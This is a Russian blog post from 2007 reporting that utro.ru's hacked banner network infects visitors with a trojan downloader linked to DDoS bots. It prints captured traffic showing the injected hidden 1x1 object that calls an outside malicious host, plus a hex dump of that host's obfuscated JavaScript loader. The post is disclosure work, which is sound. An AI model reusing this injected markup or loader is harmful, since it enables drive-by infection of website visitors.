четверг, 6 декабря 2007 г.

Utro.ru снова заражает посетителей

Сегодня банерная сеть Утра подверглась взлому и распространяет вредоносный код - троян даунлоадер.
Боты устанавливаемые вслед за этим принимают участие в ДДоС - атаках.

Подробности:

GET /cgi-bin/banner/utro?82779&options=FN' HTTP/1.1
Host: www.txt.utro.ru
User-Agent: Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11
Accept: */*
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.utro.ru/includes5/banners/advert_part.html
Cookie: __utma=143070705.897126579.1189666299.1196144486.1196938604.33; __utmz=143070705.1194419286.21.3.utmccn=(referral)|utmcsr=ytro.ru|utmcct=/|utmcmd=referral; uid=1463242514; __utmb=143070705; __utmc=143070705

HTTP/1.1 200 OK
Date: Thu, 06 Dec 2007 11:24:48 GMT
Server: Apache/1.3.33 (Unix)
Content-Length: 648
Connection: close
Content-Type: application/x-javascript

document.close();
parent.document.getElementById('utxt82779').parentNode.innerHTML="5 баллов: Московский школьник признался в убийстве 37 человек\r\n
<object data=\"http://bannersgs.info/stat/index.php\" width=\"1\" height=\"1\" style=\"1\"></object>\r\n";



45 00 01 47 47 98 40 00 76 06 1d 79 0a 40 5e 63 E..GG.@.v..y.@^c
42 24 f3 d8 09 8f 00 50 7f a6 84 fd df a4 aa 51 B$.....P.......Q
50 18 fa f0 63 de 00 00 47 45 54 20 2f 73 74 61 P...c...GET /sta
74 2f 69 6e 64 65 78 2e 70 68 70 20 48 54 54 50 t/index.php HTTP
2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a 20 2a 2f /1.1..Accept: */
2a 0d 0a 52 65 66 65 72 65 72 3a 20 68 74 74 70 *..Referer: http
3a 2f 2f 77 77 77 2e 35 62 61 6c 6c 6f 76 2e 72 ://www.5ballov.r
75 2f 65 78 74 65 72 6e 61 6c 2f 62 61 6e 6e 65 u/external/banne
72 73 2e 70 68 70 3f 66 69 6c 65 3d 62 6c 6f 63 rs.php?file=bloc
6b 73 2f 6e 65 77 73 5f 75 74 72 6f 2e 74 70 6c ks/news_utro.tpl
0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67 75 61 67 ..Accept-Languag
65 3a 20 72 75 0d 0a 41 63 63 65 70 74 2d 45 6e e: ru..Accept-En
63 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 coding: gzip, de
66 6c 61 74 65 0d 0a 55 73 65 72 2d 41 67 65 6e flate..User-Agen
74 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 t: Mozilla/4.0 (
63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 compatible; MSIE
20 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 6.0; Windows NT
20 35 2e 31 29 0d 0a 48 6f 73 74 3a 20 62 61 6e 5.1)..Host: ban
6e 65 72 73 67 73 2e 69 6e 66 6f 0d 0a 43 6f 6e nersgs.info..Con
6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c nection: Keep-Al
69 76 65 0d 0a 0d 0a ive....

45 00 05 dc 0f 41 40 00 34 06 93 3b 42 24 f3 d8 E....A@.4..;B$..
0a 40 5e 63 00 50 09 8f df a4 aa 51 7f a6 86 1c .@^c.P.....Q....
50 10 19 20 f5 b4 00 00 48 54 54 50 2f 31 2e 31 P.. ....HTTP/1.1
20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 54 200 OK..Date: T
68 75 2c 20 30 36 20 44 65 63 20 32 30 30 37 20 hu, 06 Dec 2007
32 32 3a 34 33 3a 33 31 20 47 4d 54 0d 0a 53 65 22:43:31 GMT..Se
72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 32 rver: Apache/2.2
2e 36 20 28 46 65 64 6f 72 61 29 0d 0a 58 2d 50 .6 (Fedora)..X-P
6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 owered-By: PHP/5
2e 31 2e 36 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 .1.6..Content-Le
6e 67 74 68 3a 20 34 33 38 38 0d 0a 43 6f 6e 6e ngth: 4388..Conn
65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 ection: close..C
6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 ontent-Type: tex
74 2f 68 74 6d 6c 0d 0a 0d 0a 20 20 20 20 20 20 t/html....
20 20 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 <script>functi
6f 6e 20 76 34 37 35 38 37 62 31 33 62 39 30 34 on v47587b13b904
66 28 76 34 37 35 38 37 62 31 33 62 39 34 33 35 f(v47587b13b9435
29 7b 20 76 61 72 20 76 34 37 35 38 37 62 31 33 ){ var v47587b13
62 39 38 31 63 3d 31 36 3b 20 72 65 74 75 72 6e b981c=16; return
28 70 61 72 73 65 49 6e 74 28 76 34 37 35 38 37 (parseInt(v47587
62 31 33 62 39 34 33 35 2c 76 34 37 35 38 37 62 b13b9435,v47587b
31 33 62 39 38 31 63 29 29 3b 7d 66 75 6e 63 74 13b981c));}funct
69 6f 6e 20 76 34 37 35 38 37 62 31 33 62 39 66 ion v47587b13b9f
65 63 28 76 34 37 35 38 37 62 31 33 62 61 33 64 ec(v47587b13ba3d
33 29 7b 20 20 76 61 72 20 76 34 37 35 38 37 62 3){ var v47587b
31 33 62 61 37 62 63 3d 27 27 3b 66 6f 72 28 76 13ba7bc='';for(v
34 37 35 38 37 62 31 33 62 61 62 61 32 3d 30 3b 47587b13baba2=0;
20 76 34 37 35 38 37 62 31 33 62 61 62 61 32 3c v47587b13baba2<
76 34 37 35 38 37 62 31 33 62 61 33 64 33 2e 6c v47587b13ba3d3.l
65 6e 67 74 68 3b 20 76 34 37 35 38 37 62 31 33 ength; v47587b13
62 61 62 61 32 2b 3d 32 29 7b 20 76 34 37 35 38 baba2+=2){ v4758
37 62 31 33 62 61 37 62 63 2b 3d 28 53 74 72 69 7b13ba7bc+=(Stri
6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 ng.fromCharCode(
76 34 37 35 38 37 62 31 33 62 39 30 34 66 28 76 v47587b13b904f(v
34 37 35 38 37 62 31 33 62 61 33 64 33 2e 73 75 47587b13ba3d3.su
62 73 74 72 28 76 34 37 35 38 37 62 31 33 62 61 bstr(v47587b13ba
62 61 32 2c 20 32 29 29 29 29 3b 7d 72 65 74 75 ba2, 2))));}retu
72 6e 20 76 34 37 35 38 37 62 31 33 62 61 37 62 rn v47587b13ba7b
63 3b 7d 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 c;} document.wri
74 65 28 76 34 37 35 38 37 62 31 33 62 39 66 65 te(v47587b13b9fe
63 28 27 30 44 30 41 30 44 30 41 33 43 37 33 36 c('0D0A0D0A3C736
33 37 32 36 39 37 30 37 34 32 30 36 43 36 31 36 372697074206C616
45 36 37 37 35 36 31 36 37 36 35 33 44 32 32 36 E67756167653D226
41 36 31 37 36 36 31 37 33 36 33 37 32 36 39 37 A617661736372697
30 37 34 32 32 33 45 30 44 30 41 36 36 37 35 36 074223E0D0A66756
45 36 33 37 34 36 39 36 46 36 45 32 30 34 33 37 E6374696F6E20437
32 34 46 32 38 36 46 32 43 32 30 36 45 32 39 32 24F286F2C206E292
30 37 42 30 44 30 41 37 36 36 31 37 32 32 30 37 07B0D0A766172207
39 32 30 33 44 32 30 36 45 37 35 36 43 36 43 33 9203D206E756C6C3
42 30 44 30 41 37 34 37 32 37 39 32 30 37 42 32 B0D0A747279207B2
30 36 35 37 36 36 31 36 43 32 38 32 32 37 39 32 06576616C2822792
30 33 44 32 30 36 46 32 45 34 33 37 32 36 35 36 03D206F2E4372656
31 37 34 36 35 34 46 36 32 36 41 36 35 36 33 37 174654F626A65637
34 32 38 36 45 32 39 32 32 32 39 32 30 37 44 36 4286E292229207D6
33 36 31 37 34 36 33 36 38 32 38 36 35 32 39 37 3617463682865297
42 37 44 30 44 30 41 36 39 36 36 32 30 32 38 32 B7D0D0A696620282
31 32 30 37 39 32 39 32 30 37 42 37 34 37 32 37 1207929207B74727
39 32 30 37 42 32 30 36 35 37 36 36 31 36 43 32 9207B206576616C2
38 32 32 37 39 32 30 33 44 32 30 36 46 32 45 34 82279203D206F2E4
33 37 32 36 35 36 31 37 34 36 35 34 46 36 32 36 372656174654F626
41 36 35 36 33 37 34 32 38 36 45 32 43 32 30 35 A656374286E2C205
43 32 32 35 43 32 32 32 39 32 32 32 39 32 30 37 C225C22292229207
44 36 33 36 31 37 34 36 33 36 38 32 38 36 35 32 D636174636828652
39 37 42 37 44 37 44 30 44 30 41 36 39 36 36 32 97B7D7D0D0A69662
30 32 38 32 31 32 30 37 39 32 39 32 30 37 42 37 02821207929207B7
34 37 32 37 39 32 30 37 42 32 30 36 35 37 36 36 47279207B2065766
31 36 43 32 38 32 32 37 39 32 30 33 44 32 30 36 16C282279203D206
46 32 45 34 33 37 32 36 35 36 31 37 34 36 35 34 F2E4372656174654
46 36 32 36 41 36 35 36 33 37 34 32 38 36 45 32 F626A656374286E2
43 32 30 35 43 32 32 35 43 32 32 32 43 32 30 35 C205C225C222C205
43 32 32 35 43 32 32 32 39 32 32 32 39 32 30 37 C225C22292229207
44 36 33 36 31 37 34 36 33 36 38 32 38 36 35 32 D636174636828652
39 37 42 37 44 37 44 30 44 30 41 36 39 36 36 32 97B7D7D0D0A69662
30 32 38 32 31 32 30 37 39 32 39 32 30 37 42 37 02821207929207B7
34 37 32 37 39 32 30 37 42 32 30 36 35 37 36 36 47279207B2065766
31 36 43 32 38 32 32 37 39 32 30 33 44 32 30 36 16C282279203D206
46 32 45 34 37 36 35 37 34 34 46 36 32 36 41 36 F2E4765744F626A6
35 36 33 37 34 32 38 35 43 32 32 35 43 32 32 32 56374285C225C222
43 32 30 36 45 32 39 32 32 32 39 32 30 37 44 36 C206E292229207D6
33 36 31 37 34 36 33 36 38 32 38 36 35 32 39 37 3617463682865297
42 37 44 37 44 30 44 30 41 36 39 36 36 32 30 32 B7D7D0D0A6966202
38 32 31 32 30 37 39 32 39 32 30 37 42 37 34 37 821207929207B747
32 37 39 32 30 37 42 32 30 36 35 37 36 36 31 36 279207B206576616
43 32 38 32 32 37 39 32 30 33 44 32 30 36 46 32 C282279203D206F2
45 34 37 36 35 37 34 34 46 36 32 36 41 36 35 36 E4765744F626A656
33 37 34 32 38 36 45 32 43 32 30 35 43 32 32 35 374286E2C205C225
43 32 32 32 39 32 32 32 39 32 30 37 44 36 33 36 C22292229207D636
31 37 34 36 33 36 38 32 38 36 35 32 39 37 42 37 17463682865297B7
44 37 44 30 44 30 41 36 39 36 36 32 30 32 38 32 D7D0D0A696620282
31 32 30 37 39 32 39 32 30 37 42 37 34 37 32 37 1207929207B74727
39 32 30 37 42 32 30 36 35 37 36 36 31 36 43 32 9207B206576616C2
38 32 32 37 39 32 30 33 44 32 30 36 46 32 45 34 82279203D206F2E4
37 36 35 37 34 34 46 36 32 36 41 36 35 36 33 37 765744F626A65637
34 32 38 36 45 32 39 32 32 32 39 32 4286E2922292

Мы оповестили Касперских.
Развитие и комментарии последуют

5 комментариев:

Unknown комментирует...

РБК оповестили

Анонимный комментирует...

eSafe блокирует эти вещи проактивно... :)

Unknown комментирует...

Описание загружаемого бота:

http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf

Анонимный комментирует...

РБК опять долго искало причину?

Unknown комментирует...

Угу в пятницу банеры все еще штамповали зомбей...